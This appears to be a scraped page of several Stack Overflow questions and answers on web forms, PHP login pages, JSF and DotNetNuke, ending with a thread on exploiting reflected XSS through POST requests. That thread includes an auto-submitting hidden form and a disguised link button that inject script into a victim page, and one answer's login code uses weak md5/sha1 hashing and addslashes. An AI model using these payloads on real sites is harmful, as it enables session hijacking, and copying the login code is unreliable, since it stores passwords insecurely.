Send a user's text input to a database to update [closed] - textinput

It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center.
Closed 11 years ago.
Pretty new here. But before I ask my question, I'm not looking for "teh codez". I just want to know how one would go about doing this.
I have some regular HTML textboxes in a web page, and I want to know how I would go about taking that input (ofcourse, textbox has special ID and so does the submit button), and submitting it to a database.
I'm using Visual Web Developer 2010 Express, and SQLserver 2008 R2 express as my database. Someone suggested using c#, but what methods would I use in C#? Throw me some methods, please?
HTML inputs
<span class="ui-state-default ui-corner-all ui-icon-disk ui-icon saveButton" title="Save" style="float:left"></span><input type="text" class="lace" id="march"/><br />
<span class="ui-state-default ui-corner-all ui-icon-disk ui-icon saveButton" title="Save" style="float:left"></span><input type="text" class="lace" id="march2"/><br />
<span class="ui-state-default ui-corner-all ui-icon-disk ui-icon saveButton" title="Save" style="float:left"></span><input type="text" class="lace" id="march3"/><br />
Everything above this HR is the previous question asked here.. To be more specific, I've looked through all the tutorials in the answer i've okayed..
To be more specific, What I'm trying to accomplish is this..
I have these textboxes, SQL server 2008 R2eXpress, and VisualWebDeveloper 2010eXpress.
These text boxes are to show the original value from the database when the page loads.. But the user is able to update them. Once they change the content in these textboxes, they hit submit, and it sends it to the database to update the table that the information is sitting in..Again, not really looking for "teh codez", but just solid methods or tutorials I could look at that will help me achieve what i'm trying to do.Thanks in advance

There are many different ways you can go.
If you're using "Web forms", the answer is entirely DIFFERENT from the one you're implictly asking. I definitely encourage you to look at web forms. There are many tutorials, including this one:
http://www.asp.net/web-forms/tutorials/tailspin-spyworks/tailspin-spyworks-part-1
However, you're asking about simple CGI:
Write some HTML
Put some tags, usually including a "submit" button in a "form" tag
Provide a CGI "action" handler on the server to receive the input
Here's a good example on how to do this with C#:
http://chalaki.com/8-steps-program-install-setup-call-csharp-cgi-programs-in-iis-7/321/
Yet a third possibility is to do your processing on the client side: using Javascript (or a Javascript framework like jQuery or Dojo) running on the client's browser.

Related

Restrict page access with member login

I need to make a completely normal restricted area of my website accessible only to registered, logged-in members. The restricted pages will be pulling data from a MySQL database using PHP.
I have been searching for a way to do this, finding many useless results. Most of what I've found is either insecure, outdated or just deals with one very specific area of the process. It is incredibly frustrating spending hours studying a method of doing this, only to find out that they've used some insecure method and it's completely useless. So I'm hoping to get the opinions of the experienced stackoverflow community to point me in the right direction.
So my question is this:
Knowing that hundreds of thousands of websites have exactly the same "register, log in, grant access to pages A, B and C, log out" combination of events, is there a universally accepted way of setting this up (and if not, why not)? Is this: http://www.wikihow.com/Create-a-Secure-Login-Script-in-PHP-and-MySQL a "good" way of achieving this (assuming I figure out how to get it to work)?
The pages/database will not hold anything like credit card numbers or other sensitive information, so I don't think I'll have thousands of hackers constantly attacking the site, but I obviously want to maintain a reasonable level of security. I've been careful to avoid the potential of SQL injection attacks on the database side of things.
Many thanks,
Paul
try this.
login.php
<form action="check.php" method="post">
<table border="0" cellpadding="0" cellspacing="0" style="margin-left:auto; margin-right:auto;">
<tr><td>Nickname:</td><td><input type="text" id="usernaame" name="usernaame"></td></tr>
<tr><td>Password:</td><td><input type="password" id="passworrd" name="passworrd"></td></tr>
<tr><td colspan="2"><input type="submit" value="Login" class="button"></td></tr></table>
</form>
<br><button>Register</button></div>
check.php
<?php
session_start();
$user = htmlspecialchars(addslashes($_POST['usernaame']));
//you can also edit password encryption
$password = htmlspecialchars(addslashes(md5(sha1($_POST['passworrd']))));
//put here your query
$query = mysqli_query();
if(mysqli_num_rows($query)=="1"){
$_SESSION['logged'] = $user;
}
else{echo 'Data is incorrect';}
?>
index.php (where protected content is)
<?php
session_start();
if(!isset($_SESSION['logged'])){echo 'Please login';}
else{
//your private content here
}
?>

JSF beginner , how to get this layout? [closed]

It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center.
Closed 10 years ago.
i'm new on jsf and richfaces . Currently I'm developing my fistr jsf application (billing application) and i need of create the pages for insert orders and bill , the pages should have the following layout
My Layout
how to get this ?
You still have to use CSS to achieve this layout, it has (almost) nothing to do with JSF. Here you can find some nice examples and tutorials.
And for the JSF part, you will have the template page where you will define parts which you want to keep same on each page (like menu and footer) and parts which you want to replace on each page (this is usually the content). You can, for example, follow this tutorial from Mkyong.

DNN: Submit search with Enter key

In DotNetNuke, how can one make the search input box "search" when the user hits enter or return? The markup looks like this:
<div class="search">
<input type="text" placeholder="Search..." value="" name="q">
<a class="button" href="#">Search</a>
</div>
There's a button and it works when clicked, but the client is requesting that hitting enter on the keyboard do the same thing. The search feature works correctly and I'm worried about breaking it trying to implement this capability.
I'm backfilling for an employee who quit without notice. I'm a graphic designer, but have some familiarity with ASP.NET MVC. I have zero experience with DNN, tried reading the documentation on their site, but it seemed like it was written in another language. I'm hoping someone can explain this to me in layman's English.
Thanks!
PS - I checked this thread; didn't help: Submit Search on Enter Key?
I know I am a little late to the party, but I stumbled on this question and there is a particular DNN answer to this.
DotNetNuke.UI.Utilities.ClientAPI.RegisterKeyCapture(txtSearch, btnSearch, 13);
Place that in PageLoad, or PreInit, etc.
This isn't an MVC answer, those are already in this thread, and the controls would have to be standard webforms style controls with runat="server", etc.
DNN 6.2 does introduce the Service Framework, so you can do more MVC/MVVM style coding against it, but if you are running a version less than that, this code will come in handy.
Thanks.
jsFiddle link
Basically on keydown you wanna check for keycode 13 (which is the Enter button), then submit your form / whatever logic you have to Search!
$('.search').keydown(function (e) {
var code = (e.keyCode ? e.keyCode : e.which);
if (code === 13) { //Enter keycode
//whatever logic you have for submitting the actual form
alert('submit hit');
$('.button').trigger('click');
}
});
​
asp.net provides better way to easily do this:
<asp:panel id="pnlSearch" runat="server" cssclass="search" defaultbutton="btnSerach">
<input type="text" placeholder="Search..." value="" name="q">
<asp:linkbutton id="btnSerach" cssclass="button">Search</asp:linkbutton>
</div>
Notice the asp:panel has DefaultButton property which will do the trick.

How to display string in html format on jsf page [closed]

It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center.
Closed 10 years ago.
I m using jsf2.0. And i m making one email application, I m calling web service to read the content of the file, and i m using SAX parser to extract the content from the to read the file. And i m storing that content in string variable and set it in setter method. And displaying it in outputLabel. Now, problem is when the content is displayed in jsf page at that time it is not displaying in proper format. it's displayed in one line. But when i see the view source of page at that time in view source it's displayed in proper format. So,what should be the solution. Please reply me.
Thanks in advance.
Check out if h:outputText's escape flag set to false can help you.
escape: This attribute sets a boolean flag value that determines if
sensitive HTML and XML characters should be escaped in the output
generated by the component. It's default value is "true".
(Description from here)
Set the CSS white-space property of the parent element to pre.
E.g.
<h:outputText value="#{bean.xml}" styleClass="preformatted" />
with
.preformatted {
white-space: pre;
}
I think the good old html <pre>...</pre> around your text will display the text as you like it (assuming that it is a plain text without markup).

What methods are used to exploit XSS if a param echo'd is changed from GET to POST?

Examine this example. It is in PHP, but you should be able to pick up what is happening if you don't know PHP.
echo 'You searched for "' . $_GET['q'] . '"';
Now, obviously, this is a bad idea, if I request...
http://www.example.com/?q=<script type="text/javascript">alert('xss');</script>
OK, now I change that GET to a POST...
echo 'You searched for "' . $_POST['q'] . '"';
Now the query string in the URL won't work.
I know I can't use AJAX to post there, because of same domain policy. If I can run JavaScript on the domain, then it already has security problems.
One thing I thought of is coming across a site that is vulnerable to XSS, and adding a form which posts to the target site that submits on load (or, of course, redirecting people to your website which does this). This seems to get into CSRF territory.
So, what are the ways of exploiting the second example (using POST)?
Thanks
Here is an xss exploit for your vulnerable code. As you have aluded to, this is an identical attack pattern to POST based CSRF. In this case i am building the POST request as a form, and then I call .submit() on the form at the very bottom. In order to call submit, there must be a submit type in the form. The post request will immediately execute and the page will redirect, it is best to run post based csrf of exploits in an invisible iframe.
<html>
<form id=1 method="post" action="http://victim/vuln.php">
<input type=hidden name="q" value="<script>alert(/xss/)</script>">
<input type="submit">
</form>
</html>
<script>
document.getElementById(1).submit();//remote root command execution!
</script>
I also recommended reading about the sammy worm and feel free to ask any questions about other exploits I have written.
All I would need to do to exploit this is to get a user to click a form that sends a tainted "q" post variable. If I were being all nasty-like, I wouldcraft a form button that looks like a link (or even a link that gets written into a form POST with Javascript, sort of like how Rails does its link_to_remote stuff pre-3.0).
Imagine something like this:
<form id="nastyform" method="post" action="http://yoururl.com/search.php">
<input type="submit" value="Click here for free kittens!">
<input type="hidden" name="q" value="<script>alert('My nasty cookie-stealing Javascript')</script>" />
</form>
<style>
#nastyform input {
border: 0;
background: #fff;
color: #00f;
padding: 0;
margin: 0;
cursor: pointer;
text-decoration: underline;
}
</style>
If I can get a user to click that (thinking that he's clicking some innocent link), then I can post arbitrary data to the search that then gets echoed into his page, and I can hijack his session or do whatever other nasty things I want.
Post data isn't inherently more secure than get data; it's still user input and absolutely cannot be trusted.
CSRF attacks are a different class of attack, where some legitimate action is initiated without the permission of the user; this has the same sort of entry vector, but it's a classic XSS attack, designed to result in the injection of malicious Javascript into the page for the purpose of gaining session access or something similarly damaging.

Resources